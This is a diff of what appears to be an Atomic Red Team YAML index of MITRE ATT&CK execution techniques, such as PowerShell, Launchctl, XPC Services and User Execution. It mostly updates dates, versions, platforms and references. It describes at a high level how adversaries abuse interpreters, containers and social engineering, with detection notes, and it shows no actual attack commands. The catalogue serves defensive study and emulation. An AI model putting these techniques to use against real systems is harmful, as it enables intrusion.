-        These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+        These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
@@ -28425,7 +28739,7 @@ execution:
       - Liran Ravich, CardinalOps
       - Serhii Melnyk, Trustwave SpiderLabs
       - Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
-      - Monty
+      - "@_montysecurity"
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -28462,11 +28776,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:44:20.143Z'
       name: Cloud API
       description: "Adversaries may abuse cloud APIs to execute malicious commands.
         APIs available in cloud environments provide various functionalities and are
@@ -28503,11 +28816,10 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       x_mitre_remote_support: false
@@ -28526,13 +28838,12 @@ execution:
         url: https://github.com/Azure/azure-powershell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -28611,12 +28922,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests: []
   T1059:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Command and Scripting Interpreter
       description: |-
         Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -28627,6 +28937,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -28637,16 +28948,16 @@ execution:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      - Office 365
-      - Azure AD
       - IaaS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
@@ -28677,14 +28988,11 @@ execution:
         url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059
     atomic_tests: []
   T1609:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:25:45.507Z'
       name: Kubernetes Exec Into Container
       description: |-
         Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
@@ -28750,39 +29058,13 @@ execution:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1609
     atomic_tests: []
   T1569.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
-      type: attack-pattern
-      created: '2020-03-10T18:26:56.187Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569.001
-        url: https://attack.mitre.org/techniques/T1569/001
-      - source_name: Launchctl Man
-        url: https://ss64.com/osx/launchctl.html
-        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
-      - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
-        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
-          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
-        source_name: Sofacy Komplex Trojan
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-20T20:14:35.179Z'
       name: 'System Services: Launchctl'
       description: |
         Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
@@ -28791,6 +29073,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
         plist file on disk which can be monitored. Monitor for recently modified or
         created plist files with a significant change to the executable path executed
@@ -28803,19 +29086,42 @@ execution:
         are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
         or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
         the services are unloaded prior to deleting plist files."
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
       - 'Service: Service Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+      created: '2020-03-10T18:26:56.187Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569/001
+        external_id: T1569.001
+      - source_name: Sofacy Komplex Trojan
+        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+        url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      - source_name: Launchctl Man
+        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+        url: https://ss64.com/osx/launchctl.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1569.001
     atomic_tests:
     - name: Launchctl
@@ -28882,7 +29188,7 @@ execution:
         data, modify startup configuration parameters to load malicious system software,
         or to disable security features or logging to avoid detection.(Citation: Cisco
         Synful Knock Evolution)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T20:28:09.848Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Device CLI
       x_mitre_detection: |-
@@ -28898,72 +29204,75 @@ execution:
       x_mitre_remote_support: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1559.003:
     technique:
-      x_mitre_platforms:
-      - macOS
+      modified: '2024-10-16T16:14:12.793Z'
+      name: XPC Services
+      description: |-
+        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_contributors:
+      - Csaba Fitzl @theevilbit of Kandji
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Csaba Fitzl @theevilbit of Offensive Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      x_mitre_remote_support: false
       type: attack-pattern
       id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
       created: '2021-10-12T06:45:36.763Z'
-      x_mitre_version: '1.0'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1559.003
         url: https://attack.mitre.org/techniques/T1559/003
+        external_id: T1559.003
       - source_name: creatingXPCservices
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
         description: Apple. (2016, September 9). Creating XPC Services. Retrieved
           April 19, 2022.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
       - source_name: Designing Daemons Apple Dev
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
         description: Apple. (n.d.). Retrieved October 12, 2021.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
       - source_name: CVMServer Vuln
-        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
         description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
           in macOS and iOS. Retrieved October 12, 2021.'
+        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
       - source_name: Learn XPC Exploitation
-        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
         description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
           October 12, 2021.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
-        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XPC Services
-      x_mitre_detection: ''
-      kill_chain_phases:
-      - phase_name: execution
-        kill_chain_name: mitre-attack
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204:
     technique:
-      modified: '2024-04-12T03:46:49.507Z'
+      modified: '2024-11-11T18:52:12.103Z'
       name: User Execution
       description: |-
         An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
 
         While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
 
-        Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        Adversaries may also deceive users into performing actions such as:
+
+        * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+        * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+        * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
 
         For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
       kill_chain_phases:
@@ -28971,7 +29280,11 @@ execution:
         phase_name: execution
       x_mitre_contributors:
       - Oleg Skulkin, Group-IB
-      - Goldstein Menachem
+      - Menachem Goldstein
+      - Harikrishnan Muthu, Cyble
+      - ReliaQuest
+      - Ale Houspanossian
+      - Fernando Bacchin
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -28986,7 +29299,7 @@ execution:
       - macOS
       - IaaS
       - Containers
-      x_mitre_version: '1.6'
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Instance: Instance Start'
       - 'File: File Creation'
@@ -29013,6 +29326,10 @@ execution:
         description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
           Bookmarks. Retrieved January 2, 2024.
         url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+      - source_name: Reliaquest-execution
+        description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+          Campaign. Retrieved August 2, 2024.
+        url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
       - source_name: Telephone Attack Delivery
         description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
           4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
@@ -29023,15 +29340,19 @@ execution:
           API forms and more to scam users in popular online game “Roblox”. Retrieved
           January 2, 2024.
         url: https://blog.talosintelligence.com/roblox-scam-overview/
+      - source_name: proofpoint-selfpwn
+        description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+          From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+          2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -29048,7 +29369,7 @@ execution:
         on cloud-hosted instances, as well as the execution of arbitrary commands
         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -29096,7 +29417,7 @@ execution:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -29129,12 +29450,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests: []
   T1059.001:
     technique:
-      modified: '2024-03-01T18:01:37.575Z'
+      modified: '2024-10-15T16:39:13.228Z'
       name: 'Command and Scripting Interpreter: PowerShell'
       description: |-
         Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -29195,8 +29515,9 @@ execution:
           POWERSHELL LOGGING. Retrieved February 16, 2016.
         url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
       - source_name: Github PSAttack
-        description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
-        url: https://github.com/jaredhaight/PSAttack
+        description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+          2024.
+        url: https://github.com/Exploit-install/PSAttack-1
       - source_name: inv_ps_attacks
         description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
           Retrieved December 1, 2021.
@@ -29218,12 +29539,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.001
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -29301,14 +29621,13 @@ execution:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1059.004:
     technique:
-      modified: '2024-04-16T12:24:40.163Z'
+      modified: '2024-10-15T15:17:19.136Z'
       name: 'Command and Scripting Interpreter: Bash'
       description: |-
         Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -29366,7 +29685,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.004
     atomic_tests:
     - name: Create and Execute Bash Shell Script
@@ -29464,31 +29782,7 @@ execution:
         elevation_required: true
   T1559:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
-      type: attack-pattern
-      created: '2020-02-12T14:08:48.689Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1559
-        url: https://attack.mitre.org/techniques/T1559
-      - source_name: Linux IPC
-        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
-        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
-          March 11, 2022.
-      - source_name: Fireeye Hunting COM June 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
-        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
-          10, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-10T19:06:35.666Z'
       name: Inter-Process Communication
       description: "Adversaries may abuse inter-process communication (IPC) mechanisms
         for local code or command execution. IPC is typically used by processes to
@@ -29509,25 +29803,110 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
         or spawned processes that are associated with abuse of IPC mechanisms.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Process: Process Access'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      - SYSTEM
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+      created: '2020-02-12T14:08:48.689Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1559
+        external_id: T1559
+      - source_name: Fireeye Hunting COM June 2019
+        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+          10, 2019.
+        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+      - source_name: Linux IPC
+        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+          March 11, 2022.
+        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1559
     atomic_tests: []
+  T1059.011:
+    technique:
+      modified: '2024-10-01T15:19:54.163Z'
+      name: Lua
+      description: |-
+        Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (<code>.lua</code>), or from Lua-embedded programs (through the <code>struct lua_State</code>).(Citation: Lua main page)(Citation: Lua state)
+
+        Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Script: Script Execution'
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+      created: '2024-08-05T18:19:42.201Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/011
+        external_id: T1059.011
+      - source_name: Kaspersky Lua
+        description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+          APT. Retrieved August 5, 2024.
+        url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+      - source_name: Lua main page
+        description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+        url: https://www.lua.org/start.html
+      - source_name: Lua state
+        description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+        url: https://pgl.yoyo.org/luai/i/lua_State
+      - source_name: Cyphort EvilBunny
+        description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+          Instrumented By Lua. Retrieved August 5, 2024.'
